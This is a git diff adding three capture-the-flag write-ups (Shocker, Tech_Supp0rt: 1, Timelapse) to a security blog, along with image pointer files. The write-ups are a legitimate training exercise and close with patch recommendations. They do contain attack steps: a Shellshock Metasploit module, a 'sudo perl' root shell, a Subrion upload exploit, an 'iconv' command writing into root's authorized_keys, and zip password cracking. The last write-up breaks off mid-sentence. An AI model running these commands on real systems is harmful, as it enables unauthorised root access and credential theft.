a/content/writeup-ctf/writeup-shocker-htb/index.md b/content/writeup-ctf/writeup-shocker-htb/index.md new file mode 100644 index 0000000..10379d1 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/index.md @@ -0,0 +1,91 @@ +--- +title: "Writeup - Shocker (HTB)" +date: 2022-05-12 +slug: "writeup-shocker-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Shocker](https://app.hackthebox.com/machines/Shocker) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 2222/tcp : SSH port (OpenSSH 7.2p2) +- 80/tcp : HTTP web server (Apache 2.4.18) + +![](img/image-2.webp) + +## Exploit + +At first I start by listing the files of the website. + +![](img/image-3.webp) + +We find a `cgi-bin` folder. + +![](img/image-4.webp) + +Listing the folder we find a file: `user.sh`. + + +```bash +Content-Type: text/plain + +Just an uptime test script + + 03:47:39 up 10 min, 0 users, load average: 0.00, 0.00, 0.00 +``` +10.10.10.56/cgi-bin/user.shBy searching a little bit I quickly find exploits to [cgi-bin](https://book.hacktricks.xyz/pentesting/pentesting-web/cgi). I choose to use the Metasploit module: `multi/http/apache_mod_cgi_bash_env_exec`. + +![](img/image-5.webp) + +By running the module I get a reverse shell. I start by upgrading this reverse shell : + +![](img/image-6.webp) + +Then I get the first flag. + + +```bash +shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt +cat /home/shelly/user.txt +2ec24e11320026d1e70ff3e16695b233 +``` +## Privilege escalation + +I start by checking the sudo permissions of my user. + +![](img/image-7.webp) + +Looking on GTFO, I find the page associated to [Perl](https://gtfobins.github.io/gtfobins/perl/#sudo). I use the following command to generate a SH session as root: + + +```bash +sudo perl -e 'exec "/bin/sh";' +``` +I can now recover the last flag. + + +```bash +# id +id +uid=0(root) gid=0(root) groups=0(root) +# cat /root/root.txt +cat /root/root.txt +52c2715605d70c7619030560dc1ca467 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update the machine to patch shellshock +- Do not allow root rights to run perl diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.png new file mode 100644 index 0000000..5182a4c --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf368d780a820c74f328cb248dc31a9f5496a1ebba06f6a8bb22435973ece040 +size 150753 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.webp new file mode 100644 index 0000000..4276d45 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d64c91634d5c952948e3cdfd18da822fdd5d24978a95292ff8941828da746dab +size 91950 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.png new file mode 100644 index 0000000..7be85af --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51ddf88f1e832321be671296159fa840f35704a195e273dcf46d6add6207b0d5 +size 45343 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.webp new file mode 100644 index 0000000..7cbf5f7 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c813353bdf9cd990f71eaf7a56487b7b6a553080e5e64e2a92c24e1c3dc4b6bb +size 39976 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.png new file mode 100644 index 0000000..7970a17 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c41d8a769a61a6e9a7a6155eb0f2909899950e6e19cc6179f76342c51afa1c1d +size 43919 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.webp new file mode 100644 index 0000000..6a65019 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a67f7580f63c22b323432ccdfbb5f7522815cd86fdf773b029c670a461b8699 +size 33336 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.png new file mode 100644 index 0000000..f0846fe --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a6cdbf0a8ed4ca417d416e438f90dfabb01464c126b22858e2f49177db61082 +size 28448 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.webp new file mode 100644 index 0000000..85f89bd --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3d7311cd6cb66913a4dba00fed96dbed2373bd62b402b204528c3e821e9f4d1 +size 24894 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.png new file mode 100644 index 0000000..ab01456 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:98d87f6cb58053b1cd3084d49f3f38cbdaf512c19821e3c7be7b495891817772 +size 25605 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.webp new file mode 100644 index 0000000..dff9d1e --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8caa18a6721455d519d00817be2e0c1902bdb9e48e6988e7c9b97dce05ef3ba0 +size 27144 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.png new file mode 100644 index 0000000..afd7e70 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82be2e63eca591071711c5db472f82ff765827e1cdd25aaaf09f171b4ef05faf +size 17964 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.webp new file mode 100644 index 0000000..b270134 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93f8e2303328980f8c67c133681ac05d7de45c3ea56acf51ead7a276a3b23dba +size 17212 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.png new file mode 100644 index 0000000..a6ec94a --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9644dc96bc68d12be8d11fbb48624e83dd970d5040687eed004c1c07b598d46b +size 25737 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.webp new file mode 100644 index 0000000..9d0111a --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9db82c066d2a9a7aa68679c327acd37cb062f72edb19b67ea31353397d1d3404 +size 26638 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.png new file mode 100644 index 0000000..b457c00 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eca01066449bf06ffca64618f6fdcb0c45f6f4950505c63fa9a177b2f17fc566 +size 183081 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.webp new file mode 100644 index 0000000..25f43ee --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:22dc25fac7efacf55f6838699c4c3aa233247d860acbfaa30bae26b4b87a53df +size 148392 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.png new file mode 100644 index 0000000..8d33516 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0274bea9297bf02e7fb9bd6351f2a136a5a520c2c676b0e7024c3b0b43fd69a +size 65134 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.webp new file mode 100644 index 0000000..2dee235 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a4d34cf24004f60ba18d4b1502101702ef5f66b9b4a6c88e5a36efa2068b8dc +size 67682 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.png new file mode 100644 index 0000000..5ac51ca --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8d780b23ed884aa33c67754c34c378045199d8a3d69ded62210d4a7bde57c0c +size 284503 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.webp new file mode 100644 index 0000000..4aa1693 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea0c9b7d5b4d30a9b197859c053467ec286c4f2acb964581891116e4088484ce +size 94440 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.png new file mode 100644 index 0000000..79634fe --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d05c1de3b46ccff3981535d1c1ddfa2eacca4374dc90cb5bca098c7e997fde5a +size 555403 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.webp new file mode 100644 index 0000000..25dbbd1 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf0c05aed715b5665ad1e756fa7ca6d8a81d7dbe20e71751863816196ebab616 +size 50762 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.png new file mode 100644 index 0000000..70def27 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2a406af625832caf136239b77ee55c9a14753236108d4b00b8eec88c90962b2 +size 17462 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.webp new file mode 100644 index 0000000..1cbbcd4 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d0bafd66a22924a800fb696b80bcaa9e1c87f4f07cd335ff7beef11631cccf0 +size 17206 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.png new file mode 100644 index 0000000..ad7d22f --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:689b1249eeacb521dec3f5b300be19873e594cefb1913c6f6ebdf555b772bdf5 +size 50998 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.webp new file mode 100644 index 0000000..529e713 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f12897db17120a2f241cabd0dc7a836856f65f14a247581647326d9f31de4944 +size 47376 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.png new file mode 100644 index 0000000..ee7cfad --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0501034d8b8712737ef533ad03037797867d2a1338d713658120a4ba82e0ce23 +size 39530 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.webp new file mode 100644 index 0000000..0f16de5 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e52403262515ceba79ce17891836066173bd5a806d8a179c1fb2c197dac65360 +size 20086 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.png new file mode 100644 index 0000000..2e15dc1 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:224febff12ae24f60dbab76fd3059a1a1e68e53c6eb615fecd5c5d4626e416ff +size 342807 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.webp new file mode 100644 index 0000000..5d649f7 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3356a97284008884e0e7c53e55c312608feec893a6a9f6b84ebb6b332343290d +size 49922 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/index.md b/content/writeup-ctf/writeup-techsupp0rt1-thm/index.md new file mode 100644 index 0000000..2e7cc97 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/index.md @@ -0,0 +1,162 @@ +--- +title: "Writeup - Tech_Supp0rt: 1 (THM)" +date: 2022-05-14 +slug: "writeup-techsupp0rt1-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Tech\_Supp0rt](https://tryhackme.com/room/techsupp0rt1) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.222.86 +``` +Four TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.2p2) +- 80/tcp : HTTP web server (Apache 2.4.18) +- 139/tcp : Samba (3.X - 4.X) +- 445/tcp : Samba  (3.X - 4.X) + +![](img/image-2.webp) + +## Exploit + +First, I start by scanning the site's folders. + +![](img/image-3.webp) + +We find 2 interesting files: + +![](img/image-4.webp) + +![](img/image-5.webp) + +After some research on the 2 sites, I decide to look at the smb server. For that I try to connect anonymously. + +![](img/image-6.webp) + +It works and I can get an `enter.txt` file. + + +```bash +GOALS +===== +1)Make fake popup and host it online on Digital Ocean server +2)Fix subrion site, /subrion doesn't work, edit from panel +3)Edit wordpress website + +IMP +=== +Subrion creds +|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula] +Wordpress creds +|-> +``` +In this file we learn the existence of another site in the `Subrion` folder, but in addition we are provided with credentials for it. After testing, the password doesn't seem to work. So I make a scan of the file to see if I can find something interesting: + +![](img/image-7.webp) + +A `robots.txt` file but nothing special in it: + + +```bash +User-agent: * +Disallow: /backup/ +Disallow: /cron/? +Disallow: /front/ +Disallow: /install/ +Disallow: /panel/ +Disallow: /tmp/ +Disallow: /updates/ +``` +So I try to decrypt the password with CyberChef. As soon as I propose the string of characters, CyberChef decodes the following string of characters: [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true)&input=N3NLdm50WGRQRUpheGF6Y2U5UFhpMjR6YUZyTGlLV0Nr) + +![](img/image-8.webp) + +So I try to use this password. + +![](img/image-9.webp) + +Now that I am connected and I know the version of Subrion, I start looking for exploits to have a reverse shell. + + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ searchsploit subrion 4.2.1 +---------------------------------------------------------------------------------- --------------------------------- + Exploit Title | Path +---------------------------------------------------------------------------------- --------------------------------- +Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting | php/webapps/47469.txt +Subrion CMS 4.2.1 - 'avatar[path]' XSS | php/webapps/49346.txt +Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py +Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) | php/webapps/50737.txt +Subrion CMS 4.2.1 - Cross-Site Scripting | php/webapps/45150.txt +---------------------------------------------------------------------------------- --------------------------------- +Shellcodes: No Results +``` +Quickly I find a file sending exploit that would allow to get a reverse shell. I download it with the following command: + + +```bash +searchsploit -x php/webapps/49876.py > exploit.py +``` +Then I run it with the following command: + +![](img/image-10.webp) + +Another solution to have a reverse shell would have been to use the upload page present in : content -> upload. While trying this solution I noticed that the version with the `.php` extension does not work but the `.phar` version does: + +![](img/image-11.webp) + +Searching I find that the first flag is held by the user `scamsite`. So I go to the wordpress folder to see if I can find information in the configuration files: + + +```bash +[...] +/** MySQL database username */ +define( 'DB_USER', 'support' ); + +/** MySQL database password */ +define( 'DB_PASSWORD', 'ImAScammerLOL!123!' ); + +/** MySQL hostname */ +define( 'DB_HOST', 'localhost' ); +[...] +``` +So I try to connect via SSH with this password and it works. So I can recover the first flag. + +![](img/image-12.webp) + +## Privilege escalation + +I start by looking at the sudo permissions: + +![](img/image-13.webp) + +My user has the right to execute the `iconv` command with root rights, so I'm looking for exploits on the GTFObin site: [iconv](https://gtfobins.github.io/gtfobins/iconv/#sudo). + +There is a possibility to write in a file with this command. I will write my public RSA key in the `authorized_keys` to be able to connect in SSH: + + +```bash +echo "id_rsa.pub" | sudo iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys + +``` +I now have a root shell and can retrieve the last flag. + +![](img/image-14.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not allow anonymous access on an SMB server +- Do not leave passwords in accessible files +- Do not leave executable applications with sudo root if not necessary diff --git a/content/writeup-ctf/writeup-timelapse-htb/featured.png b/content/writeup-ctf/writeup-timelapse-htb/featured.png new file mode 100644 index 0000000..bb6cf71 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0596b3be91f30df48ce48d6167235e7c484e7c190b0a632c378746b979f4e1cd +size 355802 diff --git a/content/writeup-ctf/writeup-timelapse-htb/featured.webp b/content/writeup-ctf/writeup-timelapse-htb/featured.webp new file mode 100644 index 0000000..4e5bada --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21041abf5dfcedb3c8db8463d858558d4d7aaa2eaf2983886a34a5cae7108293 +size 31990 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-1.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.png new file mode 100644 index 0000000..b323f90 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9233097338bd4e0b245b89de23a20c87bea9395db2e27d27e6aa84b047ab2021 +size 116145 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-1.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.webp new file mode 100644 index 0000000..35bf3c4 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6469990e67543bf3a7c0f8249ca5c5b7d806b3e12372ae1c910793e2d99eabc4 +size 105246 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-2.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.png new file mode 100644 index 0000000..d36482e --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7651aeb109a1258becbfdde305b76d54436bc87674a71fea83cd476eff521dee +size 10533 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-2.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.webp new file mode 100644 index 0000000..7be2b80 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2460d9e67ed60abe2359b5b379bd120ee1949968b7bf6767da5b43d9447c44da +size 18054 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-3.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.png new file mode 100644 index 0000000..c1ec29c --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:08fadb67d7fa3dc922d072d10ea28f41463798bda6e94cd7ea3534500508487f +size 21847 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-3.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.webp new file mode 100644 index 0000000..06cdd35 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:379c3dd549f467e6b96072c79a5b9d2f49f995315a84238ed0d81697d7ac0a72 +size 20040 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-4.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.png new file mode 100644 index 0000000..d238385 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7623584a87870ed139f149528e6c269dd37866cf867b6c42e9009b42253aaca8 +size 46237 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-4.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.webp new file mode 100644 index 0000000..766a97c --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e39ef3841fb2a8b5a84510fb4a8b49e33d73af50185c3d0ffe24e14fd84df479 +size 37598 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-5.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.png new file mode 100644 index 0000000..1a77855 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25b74453b46c258e6e5f63493d12f4980f294ab79a0618ff5ed1a7febcd3ba7a +size 38147 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-5.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.webp new file mode 100644 index 0000000..1878ae8 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d7031ccae6c8cd1e327ec4e359b7810cb725a082613af311f55119ce11a3bbb +size 37246 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-6.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.png new file mode 100644 index 0000000..662a0da --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:792d359151a6cbd48751800e1fcac345d158ba6a2f4637dab8a57b66e6562355 +size 32552 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-6.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.webp new file mode 100644 index 0000000..58a8385 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0f088e666efc651948c318e9b8564ba4c31ebf068a0592db4782a0d2bda7162 +size 32166 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-7.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.png new file mode 100644 index 0000000..ec0051c --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5418cd7182f072cacb0976b05a8d73ad5316b1043e743b0d4dda5a6b15a4e3ab +size 27057 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-7.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.webp new file mode 100644 index 0000000..5348f65 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:981af77270afdb4a4dac7edcf2a6331acb77d45f7d7c85f13e4d65f9180ecfce +size 23342 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-8.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.png new file mode 100644 index 0000000..e2e4c2d --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c882050046d580402ff79752d2f6e76ab047422296059a951a7ae785c5ac263 +size 15697 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-8.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.webp new file mode 100644 index 0000000..2bf257f --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6978a194afeba668f705f7122f27d0b639470e7234155e90c2f2e3b048b87c31 +size 14688 diff --git a/content/writeup-ctf/writeup-timelapse-htb/index.md b/content/writeup-ctf/writeup-timelapse-htb/index.md new file mode 100644 index 0000000..5a08c8c --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/index.md @@ -0,0 +1,149 @@ +--- +title: "Writeup - Timelapse (HTB)" +date: 2022-04-03 +slug: "writeup-timelapse-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Timelapse](https://app.hackthebox.com/machines/Timelapse) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.129.188.205 +``` +Many TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) + +## Exploit + +First I start by listing the SMB shares with the `guest` account: + + +```bash +enum4linux -a -u "guest" -p "" 10.129.188.205 +``` +![](img/image-2.webp) + +The `Shares` folder is available for reading, let's see what we can find in it: + +![](img/image-3.webp) + +We find two folders, in one of the two folders we find the file `winrm_backup.zip`, I download it then I try to unzip it. Problem is that it is protected by a password. Let's try to crack this password with john. To do so, I start by extracting the hash with the following command: + + +```bash +zip2john winrm_backup.zip > hash +``` +Then I launch the dictionary attack with john with the rockyou dictionary: + +![](img/image-4.webp) + +Quickly I find that the password is `supremelagacy`. So now I can unpack the archive. In this archive I find a file with the extension `.pfx`. These files are used by windows to store certificates in `PKCS#12` format. From this file we have the possibility to retrieve the certificate and the private key (cf. 